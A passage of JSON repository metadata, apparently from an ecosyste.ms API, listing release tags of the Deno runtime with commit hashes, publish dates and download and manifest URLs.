es/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-